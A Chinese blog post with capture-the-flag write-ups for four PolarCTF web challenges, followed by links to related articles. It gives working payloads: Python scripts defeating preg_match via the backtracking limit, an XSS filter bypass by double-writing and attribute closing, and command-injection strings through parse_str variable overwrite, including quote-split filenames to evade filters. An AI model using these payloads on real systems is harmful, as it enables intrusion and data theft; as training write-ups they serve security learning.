polarctf靶场【web】swp、召唤神龙、浮生日记、干正则

已于 2024-08-25 11:26:40 修改
阅读量1.9k 收藏 19
点赞数 28
分类专栏: polarD&NCTF靶场 WriteUP 文章标签: 前端 js python web xss 网络安全 网络信息安全
于 2024-05-07 09:47:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73981089/article/details/138520071
版权

目录

​编辑

[web]swp

考点:敏感文件、preg_match()函数绕过

[web]召唤神龙

考点:jsfuck

​1.将其用工具进行解码

​2.也可以直接控制台译出

[web]浮生日记

考点:xss

[web]干正则

考点:parse_str变量覆盖

 

[web]swp

考点:敏感文件、preg_match()函数绕过

什么是swp文件:

vim中的swp即swap文件,在编辑文件时产生,它是隐藏文件。这个文件是一个临时交换文件,用来备份缓冲区中的内容。如果原文件名是data,那么swp文件名就是.data.swp。如果文件正常退出,则此文件自动删除。需要注意的是如果你并没有对文件进行修改,而只是读取文件,是不会产生swp文件的。强行关闭vim时,vim自动生成一个swp文件,当源文件被意外删除时,可以利用swp文件恢复源文件。

依据题目的提示,可能存在swp文件,用kali dirsearch工具扫一扫

得到的子域,将其访问


function jiuzhe($xdmtql){ //接受一个xdmtql变量
    return preg_match('/sys.*nb/is',$xdmtql); //匹配变量
}

$xdmtql=@$_POST['xdmtql']; //判断变量是否为数组类型,不为数组类型往下判断
if(!is_array($xdmtql)){  //利用jiuzhe函数进行匹配输入的值
    if(!jiuzhe($xdmtql)){
        if(strpos($xdmtql,'sys nb')!==false){  //绕过 preg_match函数后匹配变量,匹配到的话输出flag
            echo 'flag{*******}';
        }else{
            echo 'true .swp file?';
        }
    }else{
        echo 'nijilenijile';  //匹配到/sys.*nb/is的话输出
    }
}

考虑如何同时绕过pre_match()和strpos()函数,不pre_match()让匹配到,一个又要strpos()匹配到。是个回溯问题,由于pre_match()函数处理的字符长度有限,如果超过这个长度就会返回false也就是没有匹配到,所以我们写一段代码,让pre_match()函数报错,绕过该函数,这样strpos()函数就可以顺利的匹配到我们的字符串从而输出flag

import requests
url = 'http://b0533b47-df70-46d3-8840-0aba3ecc326b.www.polarctf.com:8090'
data = {
    'xdmtql': 'sys nb' + 'very' * 250000
}
r = requests.post(url=url, data=data).text
print(r)

或者

import requests
data = {"xdmtql": "sys nb" + "aaaaa" * 1000000}
res = requests.post('http://b0533b47-df70-46d3-8840-0aba3ecc326b.www.polarctf.com:8090/', data=data, allow_redirects=False)
print(res.content)

​便可得到flag

[web]召唤神龙

考点:jsfuck

什么是JSFuck?

JSFuck是基于JavaScript原子部分的深奥和教育性编程风格。它仅仅使用六个不同的字符来编写和执行代码。

分别是:{​ }​ [​ ]​ +​ !​
它不依赖于浏览器,因此可以在Node.js上运行。

打开网址,发现是js小游戏,先查看源码,没有可以利用的信息,然后用调试器查看,看到main.js有一串明显的jsfuck

1.将其用工具进行解码
2.也可以直接控制台译出

便可得到flag

[web]浮生日记

考点:xss

根据源码的提示

试试xss语句,输入,发现过滤了script

<script>alert(1)</script>

 

运行后发现script被过滤,进行双写绕过,发现没有显示

<scriscriptpt>alert(1)</scriscriptpt>

那就先闭合value值,再双写绕过

"><scriscriptpt>alert(1)</scriscriptpt>

成功弹窗点击确定即可跳转到flag页面得到flag

[web]干正则

考点:parse_str变量覆盖

@parse_str($id); 这个函数不会检查变量 $id 是否存在,如果通过其他方式传入数据给变量$id ,且当前$id中数据存在,它将会直接覆盖掉

发现a[0]的值确实被更改了,那么接下来就简单了,先构造一个cmd=|ls;,发现回显了flag.php,但是不能直接读取,我们尝试用读取ls的命令

?id=a[0]=www.polarctf.com&cmd=|cat `ls`;//回显之后直接点击源码便可得到flag

?id=a[]=www.polarctf.com&cmd=|ls //发现有flag.php,但是不能直接读取
?id=a[0]=www.polarctf.com&cmd=;cat%20flag*
或?id=a[0]=www.polarctf.com&cmd=;cat%20fl''ag.php


?id=a[0]=www.polarctf.com&cmd=;tac f* //可直接读取flag

 得到flag

【漏洞挖掘】——61、SWP文件泄露漏洞检测利用
Fly_鹏程万里
10-20 832
SWP文件泄露漏洞是指在使用Vim编辑器编辑一个文件时,Vim会在同一目录下创建一个以".swp"结尾的临时文件来保存编辑过程中的变化,如果在编辑过程中Vim进程被意外终止或者用户没有正确地退出Vim,那么这个临时文件可能会被留下来,如果攻击者能够访问这个临时文件就可以获得原始文件的敏感信息,从而导致信息泄露,需要注意的是不同的操作失败次数将会导致产生不同后缀的交互文件,例如:index.php第一次产生的交换文件名为.index.php.swp,再次意外退出后将会产生名为.index.php.swo的交换
PolarD&N-CTF-web方向-简单
J1ng_Hong的博客
12-06 3597
所以bp的方法就不行了。然后源码看了好久都没找到id=9的地方,并且我还尝试传入id这个参数。post传参一个yyds=666,这是不会被检测的。这就是说我们需要post一个名为xdmtql的变量,然后这个变量不能是数组。然后发现有一个index.php,然后发现根目录有一个flag的文件。然后发现了一个叫做/.index.php.swp的备份文件。这就说明,如果换行符应该是不会被检测的。虽然很多乱码,但是flag还是包含在里面的。要匹配 . ,请使用 \.。然后就得到了flag。然后就得到了flag。
polar CTF web swp
samRsa
01-03 470
polar CTF web swp 首先网站用post方式接受了一个xdmtql变量,用if判断变量是否是数组,不是数组接下来交给jiuzhe函数,这个函数的作用是去匹配变量里的sys nb,匹配到了就输出nijilenijile,没有匹配到就进入下一个if语句,strpos这个函数的作用是匹配sys nb如果匹配到了,就输出ture然后由于有!所以变成false条件成立输出flag。这里就涉及到一个回溯问
Polarctf PWN(简单):持续跟新
最新发布
2302_81473559的博客
03-20 1166
我是在学习PWN知识中在B站刚好有Polarctf平台的师傅讲的很好,所以发现了这个平台。由于我是新手如果文章那里有讲的不对的地方欢迎指正连接如下:B站连接【PolarCTF入门系列讲座——PWN篇】Polarctf平台连接开始进入主题。
polarctf靶场web】login、被黑掉的站、GET-POST、网站被黑、robots
m0_73981089的博客
04-26 1303
sal查询,bp爆破,目录扫描,get-post简单传参
Web】记录Polar靶场<简单>难度题一遍过(全)
uuzeray的博客
04-01 3950
明天XYCTF开始,今天啥也不是,过过签到八股吧。
CTF-Polar靶场-Web题目记录
xuan_yu0的博客
01-30 327
通过御剑扫一下网站(dirsearch也行),得到/.index.php.swp如图。知道preg_match有个特性就是超出一定字符数量会直接返回true(好像是的)
CTFSHOW系列-web9(信息收集-swp泄露)
SuperherRo的博客
11-25 592
CTFSHOW系列解题思路
Swp.rar_swp
09-19
标题中的"Swp.rar_swp"暗示我们关注的焦点是一个名为"Swp"的VHDL程序,它被压缩在RAR文件中。VHDL(VHSIC Hardware Description Language)是一种广泛用于电子设计自动化领域的硬件描述语言,它允许工程师用高级语言...
swp_emulate.rar_swp
09-23
在IT行业中,SWP指令是ARM处理器架构中的一个关键原语,用于原子操作。这个"swp_emulate.rar_swp"文件集似乎关注的是通过ldrex/strex指令序列来模拟SWP指令的功能。这里我们将深入探讨SWP指令、ldrex/strex指令以及...
SWP.rar_SWP-NFC_sliding window_swp
09-21
SWP(Sliding Window Protocol)通常与NFC(Near Field Communication)技术结合,用于短距离无线通信场景,如手机支付、数据传输等。 在NFC环境中,SWP协议的应用是为了确保数据的正确传输和避免数据丢失。NFC技术...
swp.c.zip_swp
09-19
标题 "swp.c.zip_swp" 提供的信息表明这是一个与 C 语言实现滑动窗口算法相关的压缩文件。滑动窗口算法是一种在数据处理和计算机科学中广泛应用的技术,特别是在网络协议、数据流分析、字符串匹配等领域。它涉及到在...
PolarCTF】康师傅
m0_63253319的博客
10-12 351
PolarD&N CTF -- 康师傅 题解
polar CTF 简单rce
samRsa
01-03 879
polar CTF 简单rce 【代码】polar CTF 简单rce。
polar CTF上传
samRsa
12-29 1044
polar CTF上传 2、经过测试.htaccess绕过。3、上传文件名为1.jpg的图片码。
polar靶场通关笔记
weixin_43296565的博客
06-06 7107
这里是关于自己打polar靶场的小笔记
PolarCTF2024冬季个人挑战赛wp含web、misc、crypto_polar冬季赛
2401_84263282的博客
06-20 1002
,3(S-#4V题目名字包含uu,推测是uuencode,得到123456,应该是某个压缩包密码尝试过各种音频隐写,都不对,赛后看讲解视频才发现是steghide,其实这个123456或许能够猜到(???得到flag.txt,再拿去uuencode解码一下。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1493
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
PolarCTF】三段密码
m0_73818758的博客
09-24 389
最后拼接得到flag为:flag{7782bbc56f03fabe56689bfc7e3b32b1}下载题目附件并解压,得到三个文件,由题目可得,三个文件分别对应flag的三个部分。第二部分为:6f03fabe56689b。第一部分为:flag{7782bbc5。
swn swo swp 嘛的
11-30
swn, swo, swp是临时隐藏文件,通常由文本编辑器(如vi或vim)在编辑文件时自动生成。这些文件的作用是在编辑期间保存文件的临时状态,以便在编辑器意外崩溃或关闭时恢复文件。swn, swo, swp文件分别代表不同的编辑器会话,其中swp是最初的临时文件,swo是第二个会话的文件,以此类推。这些文件通常可以安全地删除,因为它们只是用于恢复编辑器会话的临时文件。如果您想要删除这些文件,可以使用rm命令,例如:rm *.swp
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

剁椒排骨

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值